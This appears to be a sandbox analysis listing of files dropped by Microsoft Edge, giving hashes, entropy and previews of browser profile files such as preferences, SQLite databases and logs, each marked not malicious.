                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17632), with no line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):17635
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.485955401121807
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:stOPGQSu4Xsatfhei0FJ+iyD1hlDT/bGFQw96WiVlaTYP:sMOXuCtf30ebGWeaaTYP
                                                                                                                                                                                                                                                                                                                                MD5:BD08DE52E6E7062F5661EF0D6489D77D
                                                                                                                                                                                                                                                                                                                                SHA1:206769A978A259C7C6C131A3714657E159D71603
                                                                                                                                                                                                                                                                                                                                SHA-256:A03A13828B5BB65CB73C8BB86DCF16394F9D519EC5F1C6D64380F0B9E574FD4D
                                                                                                                                                                                                                                                                                                                                SHA-512:937BE8C209BF746D5B150DF37CBC1F320114B976B2CBF709FC659179935406EA8020DBDE522C039499CD83BC54E46268BC6519B27574884B86BE766CDE3072CF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13374622940285595","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                                                MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                                                SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                                                SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                                                SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ed6b7102-4213-4da8-a00a-419ec70555fe.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ff860a9b-4e8c-4f4f-b247-1fa3e28691b4.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.10604023330574602
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:JntLIlcntapEjVl/PnnnnnnnnnnnnvoQtEoxu:JntLIqntaoPnnnnnnnnnnnnvHj
                                                                                                                                                                                                                                                                                                                                MD5:9FF590C36F8163E4C735C4F3A7E9032A
                                                                                                                                                                                                                                                                                                                                SHA1:3A661450F2A4B0D33EA1F20C23F08D711B4AB4B7
                                                                                                                                                                                                                                                                                                                                SHA-256:8ECEAB155DF5A43031415D7A6CF5D894F524BC78D17A16B65202DA654C7F8BF2
                                                                                                                                                                                                                                                                                                                                SHA-512:2A8D932EDBDDCB85E5E8E6BFB1D4FA90697CBE32E51602E6AD6DF0A688E0B5E06C519CBF3D036486944EC714F37D374F97EAA7D6EEB3085AAEA3D505611D418A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:..-.............Q.........d....4..}...Gf...g..-.............Q.........d....4..}...Gf...g........M...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):333752
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.934260320463705
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:G2iBB0r0l0f0w0li03e0yu0Ah00G0zY0ds4VQ0y+dy6y99yC/y7rSyExyrEvZ:eikyBt7WEH3LmIdvZ
                                                                                                                                                                                                                                                                                                                                MD5:9083F159ED5B8497C9A263C7C7AA7F4E
                                                                                                                                                                                                                                                                                                                                SHA1:FD7FBC7D3021ED981A318D83880C5F82FFFC908B
                                                                                                                                                                                                                                                                                                                                SHA-256:6C81832B399CE445B4084A2644B55CFA58E701D97CCD7C9D94C4212806CF6458
                                                                                                                                                                                                                                                                                                                                SHA-512:F85BCAB320D4C6E7B690ECCD56683538BDD1BFADE3CBC9150E7E2B591FA345BF2266B339249E50E172EC997E1B3824C3E326578463528D565BF3BF5699603EA0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):628
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.232308722158838
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:/XntM+iTl3sedhOKOuuuuuuuuuuuuuuuuuuuuuuuJBsedhOfG:Wlc8NOuuuuuuuuuuuuuuuuuuuuuuu08n
                                                                                                                                                                                                                                                                                                                                MD5:FB9991AE77475D5D90A9C323A7DA214C
                                                                                                                                                                                                                                                                                                                                SHA1:0F0298DC607840EAF0788EA6A0E6F2126250C1D7
                                                                                                                                                                                                                                                                                                                                SHA-256:2A826E9470BDFE8AA2109A6477BF98D1CBE977DC6C0677B9C27D3C6DB87B3F43
                                                                                                                                                                                                                                                                                                                                SHA-512:2ED7578CA58992E2DA0B0EE96C7A6B5DE4E5EB9A1CC7E652E1B54ECC782A5B94A1C452E1CAFB174C89FBEC0305999F9C1E7D649E181B49106A41D59AB8377F4F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............T...0................39_config..........6.....n ....1

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):324
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.139221169568738
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:yh/XlL+q2P923oH+TcwtfrK+IFUt8hhUj1Zmw+hhU1LVkwO923oH+TcwtfrUeLJ:aIv4Yeb23FUt8Qj1/+QD5LYeb3J
                                                                                                                                                                                                                                                                                                                                MD5:2C5A8678C8B8F2852FBF896284F0EA0C
                                                                                                                                                                                                                                                                                                                                SHA1:5073EC8DE5118EC008E8A9767B0D75A662A5BCDC
                                                                                                                                                                                                                                                                                                                                SHA-256:7EFEB89B1D5FD422744BDABA62AF47B6E804095662313FFB9AA79A0426CD872B
                                                                                                                                                                                                                                                                                                                                SHA-512:5BFE87BC39C2B16F409392B8D73A6CAC4F93044CC747DD3DC970AF1E8639FFF7FACF10B9EBBC0AEAF5F002554A87BA7C4E41C4B1BD9EFD5924A701FEBDA72C77
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:20.301 1ce8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/10/28-17:02:20.302 1ce8 Recovering log #3.2024/10/28-17:02:20.302 1ce8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):324
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.139221169568738
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:yh/XlL+q2P923oH+TcwtfrK+IFUt8hhUj1Zmw+hhU1LVkwO923oH+TcwtfrUeLJ:aIv4Yeb23FUt8Qj1/+QD5LYeb3J
                                                                                                                                                                                                                                                                                                                                MD5:2C5A8678C8B8F2852FBF896284F0EA0C
                                                                                                                                                                                                                                                                                                                                SHA1:5073EC8DE5118EC008E8A9767B0D75A662A5BCDC
                                                                                                                                                                                                                                                                                                                                SHA-256:7EFEB89B1D5FD422744BDABA62AF47B6E804095662313FFB9AA79A0426CD872B
                                                                                                                                                                                                                                                                                                                                SHA-512:5BFE87BC39C2B16F409392B8D73A6CAC4F93044CC747DD3DC970AF1E8639FFF7FACF10B9EBBC0AEAF5F002554A87BA7C4E41C4B1BD9EFD5924A701FEBDA72C77
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:20.301 1ce8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/10/28-17:02:20.302 1ce8 Recovering log #3.2024/10/28-17:02:20.302 1ce8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):787
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.059252238767438
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
                                                                                                                                                                                                                                                                                                                                MD5:D8D8899761F621B63AD5ED6DF46D22FE
                                                                                                                                                                                                                                                                                                                                SHA1:23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
                                                                                                                                                                                                                                                                                                                                SHA-256:A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
                                                                                                                                                                                                                                                                                                                                SHA-512:4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):342
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.155894517168245
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:yxFcL+q2P923oH+TcwtfrzAdIFUt8haz1Zmw+halLVkwO923oH+TcwtfrzILJ:8v4Yeb9FUt8i1/+05LYeb2J
                                                                                                                                                                                                                                                                                                                                MD5:E5CB8524AD804BD05448D731C4B0C984
                                                                                                                                                                                                                                                                                                                                SHA1:3259BD23EDD289457D55FA4B8B50F65B7A28635D
                                                                                                                                                                                                                                                                                                                                SHA-256:79E5E68E4FAC0458B4AC2C74311E911C0CCF7122CE4F612C3E36E1079AAAEA80
                                                                                                                                                                                                                                                                                                                                SHA-512:5BC5B364369BBE603DA58CE6513ACA3D7C0B26252A9E1834982FA41D00A36B6F7365F4898BF04A94058171187FBB4D7DDC8ACB5932895AD2CA2D6E6EAAD718FE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:20.289 1ce8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/10/28-17:02:20.298 1ce8 Recovering log #3.2024/10/28-17:02:20.298 1ce8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):342
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.155894517168245
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:yxFcL+q2P923oH+TcwtfrzAdIFUt8haz1Zmw+halLVkwO923oH+TcwtfrzILJ:8v4Yeb9FUt8i1/+05LYeb2J
                                                                                                                                                                                                                                                                                                                                MD5:E5CB8524AD804BD05448D731C4B0C984
                                                                                                                                                                                                                                                                                                                                SHA1:3259BD23EDD289457D55FA4B8B50F65B7A28635D
                                                                                                                                                                                                                                                                                                                                SHA-256:79E5E68E4FAC0458B4AC2C74311E911C0CCF7122CE4F612C3E36E1079AAAEA80
                                                                                                                                                                                                                                                                                                                                SHA-512:5BC5B364369BBE603DA58CE6513ACA3D7C0B26252A9E1834982FA41D00A36B6F7365F4898BF04A94058171187FBB4D7DDC8ACB5932895AD2CA2D6E6EAAD718FE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:20.289 1ce8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/10/28-17:02:20.298 1ce8 Recovering log #3.2024/10/28-17:02:20.298 1ce8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):120
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                                                MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                                                SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                                                SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                                                SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):13
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                                                MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                                                SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                                                SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                                                SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.090756405094512
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMkwuF9hDO6vP6O+ltbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEC6stbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                MD5:D663CE705C38B77B5378E567292A85D9
                                                                                                                                                                                                                                                                                                                                SHA1:1705CCB0A7D2CAD052763B481CC4711D36A96AF6
                                                                                                                                                                                                                                                                                                                                SHA-256:BBFECD8C8F25F1792CA86588D9550C48B7559219A6E5D6BA5D6EEFE173B078E3
                                                                                                                                                                                                                                                                                                                                SHA-512:A31D7861BC8FF94737D2DED87060921FDF1ABE7F77FF0E03A871B4FDF96AD8F38B96088A133EC886E0C7985C5ED9F6F7B6CD0A9119EF7BE516E382ACAFA04EB5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF36c57.TMP (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.090756405094512
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMkwuF9hDO6vP6O+ltbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEC6stbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                MD5:D663CE705C38B77B5378E567292A85D9
                                                                                                                                                                                                                                                                                                                                SHA1:1705CCB0A7D2CAD052763B481CC4711D36A96AF6
                                                                                                                                                                                                                                                                                                                                SHA-256:BBFECD8C8F25F1792CA86588D9550C48B7559219A6E5D6BA5D6EEFE173B078E3
                                                                                                                                                                                                                                                                                                                                SHA-512:A31D7861BC8FF94737D2DED87060921FDF1ABE7F77FF0E03A871B4FDF96AD8F38B96088A133EC886E0C7985C5ED9F6F7B6CD0A9119EF7BE516E382ACAFA04EB5
                                                                                                                                                                                                                                                                                                                                Malicious:false
